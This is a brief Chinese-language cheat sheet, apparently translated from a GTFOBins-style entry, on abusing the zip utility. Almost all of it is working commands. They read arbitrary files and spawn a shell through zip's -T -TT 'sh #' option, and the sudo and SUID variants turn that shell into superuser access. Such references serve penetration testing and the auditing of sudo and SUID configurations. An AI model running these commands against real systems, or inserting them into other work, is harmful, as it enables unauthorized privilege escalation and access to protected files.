从文件中读取数据。
LFILE=file-to-read
TF=$(mktemp -u)
zip $TF $LFILE
unzip -p $TF
用来生成一个交互式的系统shell。
TF=$(mktemp -u)
zip $TF /etc/hosts -T -TT 'sh #'
rm $TF
如果二进制文件被 sudo 允许以超级用户身份运行,可能被用于访问文件系统、提升或维持特权访问。
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
suid是一种授予文件的权限类型,它允许用户使用者以文件所有者的权限来执行文件。
TF=$(mktemp -u)
./zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF